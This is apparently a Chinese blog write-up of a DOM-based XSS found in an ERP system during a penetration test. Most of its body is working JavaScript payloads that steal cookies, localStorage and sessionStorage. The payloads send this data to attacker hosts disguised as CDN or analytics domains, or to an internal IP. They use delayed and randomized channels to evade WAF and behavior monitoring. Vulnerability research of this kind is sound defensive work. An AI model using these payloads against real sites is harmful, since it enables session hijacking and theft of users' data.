DOM型XSS深度渗透实战

声明

本文章所分享内容仅用于网络安全相关的技术讨论和学习,注意,切勿用于违法途径,所有渗透测试都需要获取授权,违者后果自行承担,与本文章及作者无关,请谨记守法。

1. 概述

在一次针对甲方ERP系统的渗透测试中,我发现了一个隐秘的DOM型XSS漏洞。这种表面无害的漏洞通过巧妙构造的Payload,能够绕过同源策略、突破CSP防御,最终实现敏感数据自动化收割并发送到攻击者服务器。本文将完整呈现漏洞从发现到武器化的全路径攻击链。

2. 正文

0x01 漏洞发现:静态代码审计

漏洞代码定位:

复制代码
// 高危渲染逻辑(核心系统模块)
	function getAppProps() {
		web.portal.appProps = skysz.ajax.getSync("./web/portal/appProps");
		skysz.$("app.name").innerHTML = web.portal.appProps.appName;
		document.title = skysz.$("app.name").innerText;

漏洞成因分析

  • 信任后端返回数据,未做消毒处理
  • 使用.innerHTML渲染不可控内容
  • API响应头缺失X-Content-Type-Options: nosniff

致命漏洞链:

后端JSON接口 → 前端innerHTML渲染 → DOM解析执行

当接口返回appName: '<img οnerrοr=恶意代码>'时,立即触发XSS

0x02 漏洞验证
复制代码
// 劫持接口返回实现弹窗验证
Object.defineProperty(web.portal, 'appProps', {  get: () => ({ appName: '<img src=x onerror=alert(window.origin)>' })});

//触发弹窗
getAppProps();
0x03 数据外泄多种姿势

1、JSONP协议(跨域数据劫持)

复制代码
Object.defineProperty(web.portal, 'appProps', {
  get: () => ({
    appName: `<img src=x onerror="
      const script = document.createElement('script');
      script.src = 'https://legit-cdn.org/log?callback=__exfil&data=' + 
        btoa(JSON.stringify({
          storage: localStorage,
          sessions: sessionStorage
        }));
      document.body.appendChild(script);">`
  })
});

//创新方案:伪装合法的CDN请求规避WAF检测

2、图片信标突破(隐蔽+长度优化)

复制代码
<JAVASCRIPT>
Object.defineProperty(web.portal, 'appProps', {
  get: () => ({
    appName: `<img src=x onerror="
      (function(){
        // 双通道智能备份传输
        const data = {
          cookies: document.cookie,
          ls: localStorage,
          ss: sessionStorage
        };
        
        // 通道1:JSONP主力传输(完整数据)
        const jsonpScript = document.createElement('script');
        jsonpScript.src = 'https://cdn.trusted.com/analytics.js?' + 
          'cid=${Math.random().toString(36).substr(2)}&' +
          'data=' + btoa(JSON.stringify(data));
        
        // 通道2:图片信标备份(关键数据)
        const beaconImg = new Image();
        beaconImg.src = 'https://log.tracking.com/pixel.gif?' +
          'c=' + encodeURIComponent(data.cookies);
          
        setTimeout(() => {
          document.head.appendChild(jsonpScript);
          document.body.appendChild(beaconImg);
        }, 2000); // 延时触发绕过行为监控
      })();">`
  })
});

3、 混合传输模式:随机切换JSONP/Image

复制代码
Object.defineProperty(web.portal, 'appProps', {
  get: () => ({
    appName: `<img src=x onerror="
      (function(){
        // 组合敏感数据
        const payload = {
          cookie: document.cookie,
          storage: JSON.stringify(localStorage),
          dom: document.documentElement.innerHTML.slice(0,2000)
        };
        
        // 多路传输保障
        const jsonpFn = () => {
          const s = document.createElement('script');
          s.src = 'http://10.191.129.67:8000/j?d='+btoa(JSON.stringify(payload))+'&t='+Date.now();
        };
        
        const imgFn = () => {
          new Image().src = 'http://10.191.129.67:8000/i.gif?c='+encodeURIComponent(payload.cookie);
        };
        
        // 随机化传输策略
        Math.random() > 0.5 ? jsonpFn() : imgFn();
      })();">`
  })
});

4、数据外带核心总结

3. 总结

漏洞挖掘规则:

复制代码
1. **动态渲染点追踪**:
   - 全局搜索`.innerHTML`、`.outerHTML`、`document.write`
   - 检查Vue/React的`v-html`和`dangerouslySetInnerHTML`

2. **API响应可控性验证**:
   - 修改后端返回的JSON内容
   - 测试XSS向量在不同上下文的触发情况

3. **同源策略突破路径**:
   ```javascript
   // 四重渗透路径检测
   const CHANNELS = [
     'fetch',
     'WebSocket',
     'navigator.sendBeacon',
     'new Image()'
   ];

4. 结语

愿诸君以深度防御为盾,以持续审计为刃,在代码构建的数字迷宫中,搭建不可逾越的安全长城。

相关推荐
枷锁—sha4 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1196 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
独行soc7 小时前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
独行soc7 小时前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
ESBK20258 小时前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec8 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用9 小时前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
原来是你~呀~10 小时前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian10 小时前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront
乾元10 小时前
终端安全(EDR):用深度学习识别未知勒索软件
运维·人工智能·网络协议·安全·网络安全·自动化·安全架构